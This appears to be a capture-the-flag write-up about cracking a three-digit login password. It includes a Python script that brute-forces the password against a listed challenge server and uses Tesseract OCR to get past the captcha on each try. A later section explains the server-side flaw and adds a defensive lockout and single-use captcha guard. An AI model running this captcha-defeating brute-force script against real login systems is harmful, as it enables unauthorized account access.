```html
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script src="jquery-2.0.3.js"></script>
</head>
<body>
破解3位数字密码
<br>
<form action="login.php" method="POST">
用户名:<input type="text" value="admin" name="username" id="username"><br>
密 码:<input type="text" value="" name="pwd"><br>
验证码:<input type="text" value="" name="user_code">
<a href="#" class="code" ><br><img src="./vcode.php" onclick="this.src='./vcode.php'"></a>
<input type="submit" value="submit" name="Login"><br>
</form>
</body>
</html>
```
In the browser it looks roughly like this:
Analysis:
If there were no captcha you could brute-force this directly with Burp; with the captcha it is still no big deal, a Python script that recognizes it does the job. Source first. This is the first Python script I have written, so it is not very elegant and a bit slow; multithreading could be added, which is possible but unnecessary (actually I did not look up how to write it).
```python
# -*- coding:UTF-8 -*-
from PIL import Image
import requests
import pytesseract

url_login = "http://39.100.83.188:8002/login.php"
url_image = "http://39.100.83.188:8002/vcode.php"
header = {}
payload = {"username": "admin", "pwd": "admin", "user_code": "1234"}

# Fetch the login page once to obtain a session cookie and reuse it for every
# request (the slice drops the trailing attributes of the Set-Cookie header)
r = requests.get(url_login)
header['Cookie'] = r.headers['Set-Cookie'][0:-8]

for i in range(100, 1000):
    payload['pwd'] = str(i)
    print("-------------------测试密码:{}...----------------------".format(i))
    judge = True
    while judge:
        # Request a fresh captcha image, save it and OCR it with Tesseract
        r = requests.post(url_image, headers=header)
        with open("F:/Test.png", "wb") as img:
            img.write(r.content)
        img = Image.open("F:/Test.png")
        text = pytesseract.image_to_string(img)
        payload["user_code"] = text[0:4]
        # Submit the current password guess together with the OCR result
        r = requests.post(url_login, data=payload, headers=header)
        r.encoding = "UTF-8"
        if "验证码错误" in r.text:
            # Captcha was misread: fetch a new one and retry the same password
            print("验证码{}错误!".format(text))
        elif "密码错误" in r.text:
            print("WARNING:密码错误!")
            judge = False
        elif "flag" in r.text:
            print(r.content)
            judge = False
            exit(0)
        else:
            print("未知状态!")
```
PS: this script actually has quite a few small issues; for example, the password has three digits, so 000-099 were not considered.
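Why the captcha does not help here is worth stating from the server's side: the login endpoint accepts an unlimited number of attempts, and every request can fetch a brand-new captcha, so an OCR misread costs the attacker nothing but one more round trip. The following added example (my own code, not part of the original post or the challenge site) shows a minimal in-memory guard that closes both gaps: failed attempts per client and account are counted in a sliding window and trigger a lockout, and each captcha is bound to a session and consumed on the first attempt that uses it. The class and function names, the limits and the constructed secret password are all assumptions made for the illustration.

```python
import secrets
import time
from collections import defaultdict, deque

# Hypothetical policy values chosen for the example
MAX_FAILURES = 5        # failed attempts allowed per (client IP, username) ...
WINDOW_SECONDS = 300    # ... within this sliding window
LOCKOUT_SECONDS = 900   # how long the pair stays locked once the limit is hit


class LoginGuard:
    """Tracks failed logins and single-use captchas for a login endpoint."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.failures = defaultdict(deque)  # key -> timestamps of recent failures
        self.locked_until = {}              # key -> time at which the lockout expires
        self.captchas = {}                  # session id -> expected captcha answer

    def issue_captcha(self, session_id):
        """Generate a fresh 4-digit challenge bound to the session. Re-issuing
        replaces the old one, so re-fetching the image never buys an extra try."""
        answer = "".join(secrets.choice("0123456789") for _ in range(4))
        self.captchas[session_id] = answer
        return answer  # a real application would render this as an image

    @staticmethod
    def _key(client_ip, username):
        return (client_ip, username)

    def is_locked(self, client_ip, username):
        until = self.locked_until.get(self._key(client_ip, username))
        return until is not None and self.clock() < until

    def _record_failure(self, key):
        now = self.clock()
        recent = self.failures[key]
        recent.append(now)
        while recent and now - recent[0] > WINDOW_SECONDS:
            recent.popleft()
        if len(recent) >= MAX_FAILURES:
            self.locked_until[key] = now + LOCKOUT_SECONDS
            recent.clear()

    def check_login(self, session_id, client_ip, username, password, captcha, verify_password):
        """Return 'locked', 'bad_captcha', 'bad_password' or 'ok'."""
        key = self._key(client_ip, username)
        if self.is_locked(client_ip, username):
            return "locked"
        # The captcha is consumed on every attempt, right or wrong, so a misread
        # (or a wrong password) always forces a new challenge
        expected = self.captchas.pop(session_id, None)
        if expected is None or not secrets.compare_digest(expected, captcha):
            self._record_failure(key)
            return "bad_captcha"
        if not verify_password(username, password):
            self._record_failure(key)
            return "bad_password"
        self.failures.pop(key, None)
        return "ok"


def simulate_guessing(guard, attempts):
    """Constructed scenario: a client that reads every captcha correctly (as OCR
    would) but has to guess the password. Returns the outcome of each attempt."""
    def verify(username, password):
        return username == "admin" and password == "742"  # constructed secret

    outcomes = []
    for i in range(attempts):
        answer = guard.issue_captcha("sess-1")
        outcomes.append(guard.check_login("sess-1", "203.0.113.9", "admin",
                                          str(100 + i), answer, verify))
    return outcomes


if __name__ == "__main__":
    # With MAX_FAILURES = 5 the sixth guess onwards is refused outright
    print(simulate_guessing(LoginGuard(), 8))
```

With the limits above the loop from the script is stopped after five wrong passwords instead of running through all 900 candidates, and reusing a captcha answer that was already submitted is rejected even when it was read correctly.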
Process:
Project homepage: https://github.com/tesseract-ocr/tesseract
The project wiki has very detailed installation instructions and download links for each operating system.
I installed it on Windows. After installation you also need to add it to the system PATH environment variable and add the system environment variable TESSDATA_PREFIX; my path is: D:\Tesseract_4.1.0_Win32\tessdata
OK, all done.